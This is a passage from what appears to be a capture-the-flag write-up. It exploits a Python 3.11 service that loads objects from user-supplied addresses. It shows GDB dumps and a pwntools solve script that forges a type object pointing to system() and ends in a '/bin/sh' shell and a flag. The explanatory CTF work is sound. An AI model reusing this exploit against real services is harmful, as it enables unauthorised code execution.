>>> add('AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHH')
140737339460016
gef➤ x/30gx 140737339460016
0x7ffff72009b0: 0x0000000000000001 0x00005555559e51a0
0x7ffff72009c0: 0x0000000000000040 0x7fedcbdbbb64ace9
0x7ffff72009d0: 0x0000555555adb4e5 0x0000000000000000
0x7ffff72009e0: 0x4141414141414141 0x4242424242424242
0x7ffff72009f0: 0x4343434343434343 0x4444444444444444
0x7ffff7200a00: 0x4545454545454545 0x4646464646464646
0x7ffff7200a10: 0x4747474747474747 0x4848484848484848
0x7ffff7200a20: 0x0a29274848484800 0x0000000000000000
0x7ffff7200a30: 0x0000000000000001 0x0000000000010303
0x7ffff7200a40: 0x0000000000000004 0x0000000000000001
0x7ffff7200a50: 0xffffffff00ffffff 0x0000555555ada9a0
0x7ffff7200a60: 0x00007ffff709abb0 0x0000000000000000
0x7ffff7200a70: 0x0000000000000000 0x0000000000000000
0x7ffff7200a80: 0x0000000000000000 0x0000000000000000
0x7ffff7200a90: 0x0000000000000000 0x0000000000000000
Can you guess the next step? We are going to enter a fake object in the str
buffer, and tell the program to load it with PyObj_FromPtr
. Let’s keep focus on the previous bytes
object:
gef➤ x/10gx 140737338006704
0x7ffff709dcb0: 0x0000000000000001 0x00005555559cbac0
0x7ffff709dcc0: 0x0000000000000005 0xffffffffffffffff
0x7ffff709dcd0: 0x0000000504030201 0x0000000000000000
0x7ffff709dce0: 0x00007ffff709f870 0x00007ffff70aef10
Now let’s add a fake bytes
object in storage
:
>>> add('\x01\0\0\0\0\0\0\0\xc0\xba\x9c\x55\x55\x55\0\0\xf0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff')
140737338229456
>>> load('140737338229456')
ÀºUUUðÿÿÿÿÿÿÿÿ
And we have this in memory:
gef➤ x/30gx 140737338229456
0x7ffff70d42d0: 0x0000000000000001 0x00005555559e51a0
0x7ffff70d42e0: 0x0000000000000020 0xa6753be1cbf2463d
0x7ffff70d42f0: 0x00640053006400a4 0x0000000000000000
0x7ffff70d4300: 0x0000000000000000 0x0000000000000000
0x7ffff70d4310: 0x0000000000000000 0x0000000000000001
0x7ffff70d4320: 0x00005555559cbac0 0x00000000000000f0
0x7ffff70d4330: 0xffffffffffffffff 0x0000000079702e00
0x7ffff70d4340: 0x00007ffff70d43b0 0x0000000000000000
0x7ffff70d4350: 0x0000000000000000 0x00005555559d2ea0
0x7ffff70d4360: 0x0000000000000000 0x0000000000000000
0x7ffff70d4370: 0x0000000000000000 0x0000000000000000
0x7ffff70d4380: 0x0000000000000000 0x0000000000000000
0x7ffff70d4390: 0x0000000000000000 0x0000000000000000
0x7ffff70d43a0: 0x0000000000000000 0x0000000000000000
0x7ffff70d43b0: 0x00007ffff70d4420 0x00005555559e51a0
Notice that the fake bytes
object appears at offset 0x48
:
gef➤ x/10gx 140737338229456 + 0x48
0x7ffff70d4318: 0x0000000000000001 0x00005555559cbac0
0x7ffff70d4328: 0x00000000000000f0 0xffffffffffffffff
0x7ffff70d4338: 0x0000000079702e00 0x00007ffff70d43b0
0x7ffff70d4348: 0x0000000000000000 0x0000000000000000
0x7ffff70d4358: 0x00005555559d2ea0 0x0000000000000000
gef➤ p *(PyBytesObject *) (140737338229456 + 0x48)
$3 = {
ob_base = {
ob_base = {
ob_refcnt = 0x1,
ob_type = 0x5555559cbac0 <PyBytes_Type>
},
ob_size = 0xf0
},
ob_shash = 0xffffffffffffffff,
ob_sval = ""
}
And actually we can load it in the program:
>>> show(str(140737338229456 + 0x48))
b"\x00.py\x00\x00\x00\x00\xb0C\r\xf7\xff\x7f\x00\x00\xc0\xba\x9cUUU\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xf0\x03\x01\x01\x01\xd8\x00\x04\x80\x04\x80S\x80S\xd0\t\x1f\xd1\x05 \xd4\x05 \xd1\x00!\xd4\x00!\xd0\x00!\xd0\x00!\xd0\x00!\xc3\xbf\xc3\xbf\xc3\xbf\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 D\r\xf7\xff\x7f\x00\x00\xa0Q\x9eUUU\x00\x004\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'ModuleSpec' object has no attribute '_initializing'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
As I said, this can be useful to leak memory addresses from _ctypes
, but they are not actually needed.
Fake object primitive
The previous function was not useful for exploitation, but we figured out how we can craft fake objects in memory and make Python load them. In order to get code execution, we will need to modify a function pointer. One approach is to modify a function pointer inside a PyTypeObject
to overwrite a “magic/dunder” method (as shown in the article).
Here we must take into account that print(PyObj_FromPtr(int(addr)))
is actually PyObj_FromPtr(int(addr)).__repr__()
, or maybe it is first transformed to str
with PyObj_FromPtr(int(addr)).__str__()
. Therefore, we the idea is to enter a fake PyObject
with a fake PyTypeObject
that has a malicious function in the offset for __repr__
or __str__
(for instance, system
).
Since we already bypassed PIE, we can call system
with the Procedure Linkage Table (PLT), so that is not a problem (I used pwntools
to get the exact address).
The following code is similar to the one show-cased in the article (available here):
python = ELF('/usr/local/bin/python3.11')
python.address = python_base_addr
type_obj = sp64(0xacdc1337) + b'X' * 0x48 + sp64(python.plt.system) * 100
fake_type_obj_addr = add(p, type_obj)
fake_obj_addr = add(p, sp64(0x11) + sp64(fake_type_obj_addr + 0x48))
p.interactive()
The function sp64
is used to transform bytes into strings. Since the program uses input
, non-ASCII bytes like \x80
of \xff
will be parsed to \xc2\x80
and \xc3\xbf
:
$ python3 -q
>>> '\x80'.encode()
b'\xc2\x80'
>>> '\xff'.encode()
b'\xc3\xbf'
So this is the function, very simple:
def sp64(num: int) -> bytes:
return ''.join(chr(b) for b in p64(num)).encode()
And we have this output:
$ python3 solve.py
[+] Starting local process '/usr/local/bin/python3.11' argv=[b'python3.11', b'challenge/server.py'] : pid 850847
[*] running in new terminal: ['/usr/bin/gdb', '-q', '/usr/local/bin/python3.11', '850847', '-x', '/tmp/pwnlxyiopha.gdb']
[+] Waiting for debugger: Done
[DEBUG] Received 0x54 bytes:
b'Zero: 94524412282856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] id(0) = 0x55f82e0447e8
[+] Python base address: 0x55f82dac7000
[*] '/usr/local/bin/python3.11'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[DEBUG] Sent 0x2 bytes:
b'0\n'
[DEBUG] Received 0x7 bytes:
b'To Add:'
[DEBUG] Sent 0x49f bytes:
00000000 37 13 c3 9c c2 ac 00 00 00 00 58 58 58 58 58 58 │7···│····│··XX│XXXX│
00000010 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 │XXXX│XXXX│XXXX│XXXX│
*
00000050 58 58 c2 94 5a c2 bb 2d c3 b8 55 00 00 c2 94 5a │XX··│Z··-│··U·│···Z│
00000060 c2 bb 2d c3 b8 55 00 00 c2 94 5a c2 bb 2d c3 b8 │··-·│·U··│··Z·│·-··│
...
00000430 c2 94 5a c2 bb 2d c3 b8 55 00 00 c2 94 5a c2 bb │··Z·│·-··│U···│·Z··│
00000440 2d c3 b8 55 00 00 c2 94 5a c2 bb 2d c3 b8 55 00 │-··U│····│Z··-│··U·│
[DEBUG] Received 0x63 bytes:
b'94524420584272\n'
b'Zero: 94524412282856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[DEBUG] Sent 0x2 bytes:
b'0\n'
[DEBUG] Received 0x7 bytes:
b'To Add:'
[DEBUG] Sent 0x15 bytes:
00000000 11 00 00 00 00 00 00 00 c2 98 c3 b3 c2 82 2e c3 │····│····│····│··.·│
00000010 b8 55 00 00 0a │·U··│·│
00000015
[DEBUG] Received 0x64 bytes:
b'140671526391504\n'
b'Zero: 94524412282856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] Switching to interactive mode
Zero: 94524412282856
0) Add To Store
1) Remove From Store
2) Load Address
Selection:$
And these are the allocated objects with the fake objects inside:
gef➤ x/30gx 94524420584272
0x55f82e82f350: 0x0000000000000001 0x000055f82df581a0
0x55f82e82f360: 0x0000000000000370 0xffffffffffffffff
0x55f82e82f370: 0x0000001a000000a4 0x0000000000000000
0x55f82e82f380: 0x0000000000000000 0x0000000000000000
0x55f82e82f390: 0x0000000000000000 0x00000000acdc1337
0x55f82e82f3a0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3b0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3c0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3d0: 0x5858585858585858 0x5858585858585858
0x55f82e82f3e0: 0x5858585858585858 0x000055f82dbb5a94
0x55f82e82f3f0: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f400: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f410: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f420: 0x000055f82dbb5a94 0x000055f82dbb5a94
0x55f82e82f430: 0x000055f82dbb5a94 0x000055f82dbb5a94
gef➤ x/30gx 140671526391504
0x7ff0a45c4ed0: 0x0000000000000001 0x000055f82df581a0
0x7ff0a45c4ee0: 0x0000000000000010 0xffffffffffffffff
0x7ff0a45c4ef0: 0x00000000000000a4 0x0000000000000000
0x7ff0a45c4f00: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f10: 0x0000000000000000 0x0000000000000011
0x7ff0a45c4f20: 0x000055f82e82f398 0x0000000000000000
0x7ff0a45c4f30: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f40: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f50: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f60: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f70: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f80: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4f90: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4fa0: 0x0000000000000000 0x0000000000000000
0x7ff0a45c4fb0: 0x0000000000000000 0x0000000000000000
gef➤ p *(PyObject *) (140671526391504 + 0x48)
$1 = {
ob_refcnt = 0x11,
ob_type = 0x55f82e82f398
}
gef➤ p *(PyTypeObject *) 0x55f82e82f398
$2 = {
ob_base = {
ob_base = {
ob_refcnt = 0xacdc1337,
ob_type = 0x5858585858585858
},
ob_size = 0x5858585858585858
},
tp_name = 0x5858585858585858 <error: Cannot access memory at address 0x5858585858585858>,
tp_basicsize = 0x5858585858585858,
tp_itemsize = 0x5858585858585858,
tp_dealloc = 0x5858585858585858,
tp_vectorcall_offset = 0x5858585858585858,
tp_getattr = 0x5858585858585858,
tp_setattr = 0x5858585858585858,
tp_as_async = 0x55f82dbb5a94 <system@plt+4>,
tp_repr = 0x55f82dbb5a94 <system@plt+4>,
tp_as_number = 0x55f82dbb5a94 <system@plt+4>,
tp_as_sequence = 0x55f82dbb5a94 <system@plt+4>,
tp_as_mapping = 0x55f82dbb5a94 <system@plt+4>,
tp_hash = 0x55f82dbb5a94 <system@plt+4>,
tp_call = 0x55f82dbb5a94 <system@plt+4>,
tp_str = 0x55f82dbb5a94 <system@plt+4>,
tp_getattro = 0x55f82dbb5a94 <system@plt+4>,
tp_setattro = 0x55f82dbb5a94 <system@plt+4>,
tp_as_buffer = 0x55f82dbb5a94 <system@plt+4>,
tp_flags = 0x55f82dbb5a94,
tp_doc = 0x55f82dbb5a94 <system@plt+4> "\362\377%-l8",
tp_traverse = 0x55f82dbb5a94 <system@plt+4>,
tp_clear = 0x55f82dbb5a94 <system@plt+4>,
tp_richcompare = 0x55f82dbb5a94 <system@plt+4>,
tp_weaklistoffset = 0x55f82dbb5a94,
tp_iter = 0x55f82dbb5a94 <system@plt+4>,
tp_iternext = 0x55f82dbb5a94 <system@plt+4>,
tp_methods = 0x55f82dbb5a94 <system@plt+4>,
tp_members = 0x55f82dbb5a94 <system@plt+4>,
tp_getset = 0x55f82dbb5a94 <system@plt+4>,
tp_base = 0x55f82dbb5a94 <system@plt+4>,
tp_dict = 0x55f82dbb5a94 <system@plt+4>,
tp_descr_get = 0x55f82dbb5a94 <system@plt+4>,
tp_descr_set = 0x55f82dbb5a94 <system@plt+4>,
tp_dictoffset = 0x55f82dbb5a94,
tp_init = 0x55f82dbb5a94 <system@plt+4>,
tp_alloc = 0x55f82dbb5a94 <system@plt+4>,
tp_new = 0x55f82dbb5a94 <system@plt+4>,
tp_free = 0x55f82dbb5a94 <system@plt+4>,
tp_is_gc = 0x55f82dbb5a94 <system@plt+4>,
tp_bases = 0x55f82dbb5a94 <system@plt+4>,
tp_mro = 0x55f82dbb5a94 <system@plt+4>,
tp_cache = 0x55f82dbb5a94 <system@plt+4>,
tp_subclasses = 0x55f82dbb5a94 <system@plt+4>,
tp_weaklist = 0x55f82dbb5a94 <system@plt+4>,
tp_del = 0x55f82dbb5a94 <system@plt+4>,
tp_version_tag = 0x2dbb5a94,
tp_finalize = 0x55f82dbb5a94 <system@plt+4>,
tp_vectorcall = 0x55f82dbb5a94 <system@plt+4>
}
As can be seen, the fake type object has tp_repr
and tp_str
pointing to system
. Let’s add a breakpoint and trigger it:
gef➤ break system
Breakpoint 1 at 0x7ff0a5049290: file ../sysdeps/posix/system.c, line 198.
gef➤ p/d (140671526391504 + 0x48)
$3 = 140671526391576
gef➤ continue
Continuing.
Selection:$ 2
[DEBUG] Sent 0x2 bytes:
b'2\n'
[DEBUG] Received 0x8 bytes:
b'To Load:'
To Load:$ 140671526391576
[DEBUG] Sent 0x10 bytes:
b'140671526391576\n'
$
gef➤ x/i $rip
=> 0x7ff0a5049290 <__libc_system>: endbr64
gef➤ backtrace
#0 __libc_system (line=0x7ff0a45c4f18 "\023") at ../sysdeps/posix/system.c:198
#1 0x000055f82dc79d77 in PyObject_Str (v=0x7ff0a45c4f18) at ./Include/object.h:133
#2 PyObject_Str (v=0x7ff0a45c4f18) at Objects/object.c:455
#3 0x000055f82dc3a9b5 in PyFile_WriteObject (v=0x7ff0a45c4f18, f=f@entry=0x7ff0a472bed0, flags=flags@entry=0x1) at Objects/fileobject.c:129
#4 0x000055f82dd2fef2 in builtin_print_impl (module=<optimized out>, flush=0x0, file=0x7ff0a472bed0, end=<optimized out>, sep=<optimized out>, args=0x7ff0a4716b90) at Python/bltinmodule.c:2039
#5 builtin_print (module=<optimized out>, args=<optimized out>, nargs=<optimized out>, kwnames=<optimized out>) at Python/clinic/bltinmodule.c.h:838
#6 0x000055f82dc76877 in cfunction_vectorcall_FASTCALL_KEYWORDS (func=0x7ff0a4795670, args=0x7ff0a5378078, nargsf=<optimized out>, kwnames=<optimized out>) at ./Include/cpython/methodobject.h:52
#7 0x000055f82dc1bbbf in _PyObject_VectorcallTstate (kwnames=0x55f82ddc8fba <PyErr_CheckSignals+26>, nargsf=<optimized out>, args=0x7ff0a5378078, callable=0x7ff0a4795670, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at ./Include/internal/pycore_call.h:92
#8 PyObject_Vectorcall (callable=callable@entry=0x7ff0a4795670, args=args@entry=0x7ff0a5378078, nargsf=<optimized out>, kwnames=kwnames@entry=0x0) at Objects/call.c:299
#9 0x000055f82dbbb22f in _PyEval_EvalFrameDefault (tstate=<optimized out>, frame=<optimized out>, throwflag=<optimized out>) at Python/ceval.c:7314
#10 0x000055f82dd353b5 in _PyEval_EvalFrame (throwflag=0x0, frame=0x7ff0a5378020, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at ./Include/internal/pycore_ceval.h:73
#11 _PyEval_Vector (args=0x0, argcount=0x0, kwnames=0x0, locals=0x7ff0a4802a80, func=0x7ff0a47ddf80, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at Python/ceval.c:6438
#12 PyEval_EvalCode (co=co@entry=0x55f82e836f40, globals=globals@entry=0x7ff0a4802a80, locals=locals@entry=0x7ff0a4802a80) at Python/ceval.c:1154
#13 0x000055f82dd859a7 in run_eval_code_obj (locals=0x7ff0a4802a80, globals=0x7ff0a4802a80, co=0x55f82e836f40, tstate=0x55f82e06ce58 <_PyRuntime+166328>) at Python/pythonrun.c:1714
#14 run_mod (mod=<optimized out>, filename=filename@entry=0x7ff0a47a23b0, globals=globals@entry=0x7ff0a4802a80, locals=locals@entry=0x7ff0a4802a80, flags=flags@entry=0x7ffcbbcb58e8, arena=arena@entry=0x7ff0a47277b0) at Python/pythonrun.c:1735
#15 0x000055f82dd87102 in pyrun_file (flags=0x7ffcbbcb58e8, closeit=0x1, locals=0x7ff0a4802a80, globals=0x7ff0a4802a80, start=0x101, filename=0x7ff0a47a23b0, fp=0x55f82e7ea230) at Python/pythonrun.c:1630
#16 _PyRun_SimpleFileObject (fp=fp@entry=0x55f82e7ea230, filename=filename@entry=0x7ff0a47a23b0, closeit=closeit@entry=0x1, flags=flags@entry=0x7ffcbbcb58e8) at Python/pythonrun.c:440
#17 0x000055f82dd8768f in _PyRun_AnyFileObject (fp=0x55f82e7ea230, filename=filename@entry=0x7ff0a47a23b0, closeit=closeit@entry=0x1, flags=flags@entry=0x7ffcbbcb58e8) at Python/pythonrun.c:79
#18 0x000055f82ddaa28b in pymain_run_file_obj (skip_source_first_line=0x0, filename=0x7ff0a47a23b0, program_name=0x7ff0a4802c70) at Modules/main.c:360
#19 pymain_run_file (config=0x55f82e052ea0 <_PyRuntime+59904>) at Modules/main.c:379
#20 pymain_run_python (exitcode=exitcode@entry=0x7ffcbbcb5a40) at Modules/main.c:601
#21 0x000055f82ddaa97f in Py_RunMain () at Modules/main.c:680
#22 pymain_main (args=0x7ffcbbcb5a00) at Modules/main.c:710
#23 Py_BytesMain (argc=<optimized out>, argv=<optimized out>) at Modules/main.c:734
#24 0x00007ff0a501b083 in __libc_start_main (main=0x55f82dbb6dd0 <main>, argc=0x2, argv=0x7ffcbbcb5b68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffcbbcb5b58) at ../csu/libc-start.c:308
#25 0x000055f82dbc38de in _start () at Objects/object.c:1301
We have executed system
. Actually, we can see that it executed from PyObject_Str
, so probably from __str__
and not __repr__
. But whatever, we are close to exploit this program. Observe that we have a bit of control over $rdi
:
gef➤ x/s $rdi
0x7ff0a45c4f18: "\023"
gef➤ x/gx $rdi
0x7ff0a45c4f18: 0x0000000000000013
Notice that we set 0x11
as refcnt
in the fake PyObject
, and now we are seeing 0x13
. This field is increased/decreased by the Python interpreter according to the number of references to the object. Therefore, we can add "/bin/sh\0"
in hexadecimal format (little-endian) and subtract 2
. If you don’t believe it, just hit continue
on the debugger:
[DEBUG] Received 0x14 bytes:
00000000 73 68 3a 20 31 3a 20 13 3a 20 6e 6f 74 20 66 6f │sh: │1: ·│: no│t fo│
00000010 75 6e 64 0a │und·│
00000014
sh: 1: \x13 not found
$
So, we must update the last part of the exploit:
fake_type_obj_addr = add(p, type_obj)
fake_obj_addr = add(p, sp64(u64(b'/bin/sh\0') - 2) + sp64(fake_type_obj_addr + 0x48))
load(p, fake_obj_addr + 0x48, do_recv=False)
p.interactive()
Let’s disable GDB and debug mode… And we have a shell:
$ python3 solve.py
[+] Starting local process '/usr/local/bin/python3.11': pid 862795
[*] id(0) = 0x56148b0867e8
[+] Python base address: 0x56148ab09000
[*] '/usr/local/bin/python3.11'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[*] Switching to interactive mode
$ ls
build_docker.sh challenge Dockerfile solve.py test.py
Let’s try with the Docker container:
$ python3 solve.py 127.0.0.1:1337
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] id(0) = 0x7f33f7ce9288
[+] Python base address: 0x7f33f776baa0
[*] '/usr/local/bin/python3.11'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
Ouch… It does not succeed… Probably because the Python version we have has debugging symbols or something.
Fixing the exploit
Let’s take the actual python3.11
binary from the Docker container:
$ sudo docker stop pwn_fake_snake
pwn_fake_snake
$ sudo docker run --rm -v "${PWD}:/opt" -it pwn_fake_snake bash
I have no name!@836ac3d72fd1:/$ which python3.11
/usr/local/bin/python3.11
I have no name!@836ac3d72fd1:/$ cp /usr/local/bin/python3.11 /opt
I have no name!@836ac3d72fd1:/$ exit
exit
However, we need a library called libpython3.11.so.1.0
:
$ ./python3.11
./python3.11: error while loading shared libraries: libpython3.11.so.1.0: cannot open shared object file: No such file or directory
$ ldd ./python3.11
linux-vdso.so.1 (0x00007fffea1d4000)
libpython3.11.so.1.0 => not found
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007efe6a6e4000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007efe6a6de000)
libutil.so.1 => /lib/x86_64-linux-gnu/libutil.so.1 (0x00007efe6a6d9000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007efe6a58a000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007efe6a396000)
/lib64/ld-linux-x86-64.so.2 (0x00007efe6a729000)
So, let’s take it and patch the binary:
$ sudo docker run --rm -v "${PWD}:/opt" -it pwn_fake_snake bash
I have no name!@3d417a55032b:/$ ldd /usr/local/bin/python3.11
linux-vdso.so.1 (0x00007ffc41fd8000)
libpython3.11.so.1.0 => /usr/local/bin/../lib/libpython3.11.so.1.0 (0x00007fb1133f0000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fb1133cd000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fb1133c8000)
libutil.so.1 => /lib/x86_64-linux-gnu/libutil.so.1 (0x00007fb1133c3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fb113240000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb113080000)
/lib64/ld-linux-x86-64.so.2 (0x00007fb113987000)
I have no name!@3d417a55032b:/$ cp /usr/local/bin/../lib/libpython3.11.so.1.0 /opt
I have no name!@3d417a55032b:/$ exit
exit
$ patchelf --set-rpath . python3.11
$ ./python3.11 -q
>>> exit()
Now we have it running again. Let’s add this on top of the exploit:
context.binary = python = ELF('./python3.11')
def get_process():
if len(sys.argv) == 1:
return process(['./python3.11', 'challenge/server.py'], level='DEBUG')
host, port = sys.argv[1].split(':')
return remote(host, port)
If we execute the exploit as is, we will get an error telling that python.plt.system
does not exist. So, we can comment out this part and try again with GDB attached to the process:
$ python3 solve.py
[*] './python3.11'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'.'
[+] Starting local process './python3.11' argv=[b'./python3.11', b'challenge/server.py'] : pid 876053
[*] running in new terminal: ['/usr/bin/gdb', '-q', './python3.11', '876053', '-x', '/tmp/pwnfa1izjyv.gdb']
[+] Waiting for debugger: Done
[DEBUG] Received 0x55 bytes:
b'Zero: 140083410526856\n'
b'0) Add To Store\n'
b'1) Remove From Store\n'
b'2) Load Address\n'
b'Selection:'
[*] id(0) = 0x7f67b5ec6288
[+] Python base address: 0x7f67b5948aa0
[*] Switching to interactive mode
0) Add To Store
1) Remove From Store
2) Load Address
Selection:$
First thing we notice is that the base address is not correct. Furthermore, the address of 0
is no longer inside the binary but in a library:
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x000055fadf1c6000 0x000055fadf1c7000 0x0000000000000000 r-- ./python3.11
0x000055fadf1c7000 0x000055fadf1c8000 0x0000000000001000 r-x ./python3.11
0x000055fadf1c8000 0x000055fadf1c9000 0x0000000000002000 r-- ./python3.11
0x000055fadf1c9000 0x000055fadf1ca000 0x0000000000002000 r-- ./python3.11
0x000055fadf1ca000 0x000055fadf1cb000 0x0000000000003000 rw- ./python3.11
0x000055fadfa49000 0x000055fadfada000 0x0000000000000000 rw- [heap]
0x00007f67b4ba5000 0x00007f67b4bac000 0x0000000000000000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bac000 0x00007f67b4bbd000 0x0000000000007000 r-x /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bbd000 0x00007f67b4bc3000 0x0000000000018000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bc3000 0x00007f67b4bc4000 0x000000000001d000 r-- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bc4000 0x00007f67b4bc8000 0x000000000001e000 rw- /usr/local/lib/python3.11/lib-dynload/_ctypes.cpython-311-x86_64-linux-gnu.so
0x00007f67b4bc8000 0x00007f67b4e2a000 0x0000000000000000 rw-
0x00007f67b4e2a000 0x00007f67b5613000 0x0000000000000000 r-- /usr/lib/locale/locale-archive
0x00007f67b5613000 0x00007f67b5618000 0x0000000000000000 rw-
0x00007f67b5618000 0x00007f67b563a000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x00007f67b563a000 0x00007f67b57b2000 0x0000000000022000 r-x /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x00007f67b57b2000 0x00007f67b5800000 0x000000000019a000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so
...
0x00007f67b5996000 0x00007f67b5997000 0x000000000000a000 rw- /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
0x00007f67b5997000 0x00007f67b599b000 0x0000000000000000 rw-
0x00007f67b599b000 0x00007f67b59a2000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
0x00007f67b59a2000 0x00007f67b5a90000 0x0000000000000000 r-- ./libpython3.11.so.1.0
0x00007f67b5a90000 0x00007f67b5cb3000 0x00000000000ee000 r-x ./libpython3.11.so.1.0
0x00007f67b5cb3000 0x00007f67b5d90000 0x0000000000311000 r-- ./libpython3.11.so.1.0
0x00007f67b5d90000 0x00007f67b5dbe000 0x00000000003ed000 r-- ./libpython3.11.so.1.0
0x00007f67b5dbe000 0x00007f67b5eef000 0x000000000041b000 rw- ./libpython3.11.so.1.0
0x00007f67b5eef000 0x00007f67b5f34000 0x0000000000000000 rw-
0x00007f67b5f34000 0x00007f67b5f35000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f35000 0x00007f67b5f58000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f58000 0x00007f67b5f60000 0x0000000000024000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f61000 0x00007f67b5f62000 0x000000000002c000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f62000 0x00007f67b5f63000 0x000000000002d000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x00007f67b5f63000 0x00007f67b5f64000 0x0000000000000000 rw-
0x00007ffcf47ce000 0x00007ffcf47ef000 0x0000000000000000 rw- [stack]
0x00007ffcf47f3000 0x00007ffcf47f7000 0x0000000000000000 r-- [vvar]
0x00007ffcf47f7000 0x00007ffcf47f9000 0x0000000000000000 r-x [vdso]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
Actually, the address of 0
belongs to libpython3.11.so.1.0
. Probably, we can make out the exploit using this library as if it was a binary. This is the offset needed:
gef➤ p/d 0x7f67b5ec6288 - 0x00007f67b59a2000
$1 = 5390984
Let’s update the exploit:
context.binary = python = ELF('libpython3.11.so.1.0')
# ...
def main():
p = get_process()
p.recvuntil(b'Zero: ')
zero_addr = int(p.recvline())
p.info(f'id(0) = {hex(zero_addr)}')
python.address = zero_addr - 5390984
p.success(f'Python base address: {hex(python.address)}')
type_obj = sp64(0xacdc1337) + b'X' * 0x48 + sp64(python.plt.system) * 100
fake_type_obj_addr = add(p, type_obj)
fake_obj_addr = add(p, sp64(u64(b'/bin/sh\0') - 2) + sp64(fake_type_obj_addr + 0x48))
load(p, fake_obj_addr + 0x48, do_recv=False)
p.interactive()
And we have a shell again:
$ python3 solve.py
[*] './libpython3.11.so.1.0'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './python3.11': pid 882238
[*] id(0) = 0x7fd0f67cb288
[+] Python base address: 0x7fd0f62a7000
[*] Switching to interactive mode
$ ls
build_docker.sh Dockerfile python3.11 test.py
challenge libpython3.11.so.1.0 solve.py
And also in the Docker container:
$ sudo docker run --rm --name pwn_fake_snake -p 1337:1337 -d pwn_fake_snake
c1af67fd6faac1b3b6cca10a6eb046c5d263b571564b1370123bae335bc5f7e9
$ python3 solve.py 127.0.0.1:1337
[*] './libpython3.11.so.1.0'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] id(0) = 0x7f7614caf288
[+] Python base address: 0x7f761478b000
[*] Switching to interactive mode
$ cat flag.txt
HTB{fake_flag_for_testing}
Flag
